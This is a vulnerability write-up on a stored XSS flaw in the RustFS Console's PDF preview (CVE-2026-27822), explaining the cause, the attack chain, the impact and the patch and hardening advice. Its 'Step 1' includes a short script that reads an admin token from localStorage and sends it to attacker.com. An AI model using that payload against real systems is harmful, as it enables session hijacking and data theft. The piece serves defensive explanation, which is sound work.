RustFS & The PDF Trojan: Anatomy of a Critical Stored XSS

There is a certain irony in finding a critical vulnerability in a project named RustFS. The security community has spent the last decade evangelizing Rust as the silver bullet for memory safety—killing buffer overflows and use-after-free bugs by design. And they're right; Rust is fantastic at that. But RustFS isn't just a backend storage engine; it comes with a Management Console. And that console is built on the wild, untamed west of the web: HTML and JavaScript.

CVE-2026-27822 targets the RustFS Console, specifically the component responsible for previewing files. In a distributed object store, administrators often need to verify uploaded content. They click a file, a modal pops up, and they see a preview. It's a feature designed for convenience, but in this specific version range (< 1.0.0-alpha.83), it was implemented with a fatal trust in user input.

This vulnerability is a classic Stored Cross-Site Scripting (XSS) attack. The 'Stored' part makes it particularly dangerous. Unlike Reflected XSS, where you have to trick a user into clicking a weird link, Stored XSS lays a trap. The attacker places a landmine (the malicious file) in the storage system, and the victim (the admin) triggers it simply by doing their job—managing files. The moment the preview renders, the game is over.

The root cause of this vulnerability lies in how the RustFS Console handles the rendering of PDF files within its preview modal. When a user requests a preview, the application fetches the object data and attempts to display it. The flaw involves insufficient sanitization of the content before it interacts with the DOM (Document Object Model).

Browser-based PDF rendering is notoriously tricky. If an application blindly serves a file with Content-Type: application/pdf inside an iframe or uses a client-side library to parse and render it without strict boundaries, it opens the door to script execution. In this specific case, the preview logic allowed the execution of JavaScript embedded within the file structure or disguised as a PDF context.

Essentially, the developers locked the front door (authentication required to access the console) but left the window wide open (the preview renderer). They assumed that because a file claims to be a PDF, or is treated as a static asset, it is safe to render in the browser. This assumption is fatal. Modern browsers and PDF specs are complex beasts; if you don't explicitly tell the browser not to run scripts (via CSP or sandbox attributes), it often will, just to be 'helpful'.

Exploiting this requires a low-privilege account—anyone who can upload a file to the storage bucket. The attack chain is elegant in its simplicity and devastating in its impact.

Step 1: The Payload

The attacker crafts a malicious file. While the advisory specifically mentions PDF logic, XSS payloads in this context often involve Polyglots—files that are valid enough to be accepted by the storage engine but contain HTML/JS that the browser will execute when the content-type is mishandled or when the renderer is tricked.

// Conceptual Payload injected into the file
<script>
  const adminToken = localStorage.getItem('rustfs_auth_token');
  const creepUrl = 'https://attacker.com/collect?data=' + btoa(adminToken);
  fetch(creepUrl);
</script>

Step 2: The Trap

The attacker uploads this file to a bucket they have access to. They might name it Monthly_Financials.pdf or System_Logs_Error.pdf—something that practically begs an administrator to check it.

Step 3: The Execution

An administrator logs into the RustFS Console. They see the file. "That looks important," they think. They click the Preview button. The console opens a modal to display the file. Because the application fails to sanitize the input or sandbox the rendering frame, the browser parses the attacker's JavaScript.

At this moment, the script runs in the context of the administrator's session. It silently reads localStorage, grabs the JWT or session token, and sends it to the attacker's server. The admin sees a blank preview or a broken image; the attacker sees a new root shell.

Why is this rated Critical (9.1)? Because in modern single-page applications (SPAs), localStorage is often where the "keys to the kingdom" are kept. RustFS stores administrator credentials and session tokens there.

Once an attacker has these tokens, they don't need to bypass a firewall or crack a password. They simply import the token into their own browser and become the administrator.

From there, the impact scales vertically:

1. Data Exfiltration: The attacker can read every object in every bucket.
2. Data Destruction: They can delete all backups, databases, and assets stored in the system.
3. Ransomware: They can encrypt the data (download, encrypt, re-upload, delete original) and demand payment.
4. Persistence: They can create new admin users for themselves to maintain access even if the original vulnerability is patched.

This is a "Game Over" scenario. The breach of the management console completely undermines the security of the underlying storage system.

The fix was released in version 1.0.0-alpha.83. If you are running any version prior to this, you are vulnerable. The remediation strategy is straightforward but urgent.

1. Patch Immediately

Update your RustFS instance to the latest version. The developers have patched the preview logic, likely by implementing strict output encoding, using a sandboxed iframe with the sandbox attribute (e.g., sandbox="allow-scripts" would be removed), or enforcing a strict Content Security Policy (CSP) on the preview modal.

# If using cargo to manage the binary
cargo install rustfs --version 1.0.0-alpha.83

2. Defense in Depth (Developer Takeaway)

For developers building similar systems, this is a lesson in defense in depth.

• Never trust file content: Always serve user-uploaded content with Content-Disposition: attachment to force a download rather than a browser render, unless strictly necessary.
• Sandbox Everything: If you must preview content, do it in an iframe with the sandbox attribute set to the absolute minimum permissions required.
• Stop using LocalStorage for Secrets: Storing auth tokens in localStorage makes them accessible to any XSS payload. Use HttpOnly cookies, which are invisible to JavaScript, to mitigate the impact of XSS vulnerabilities.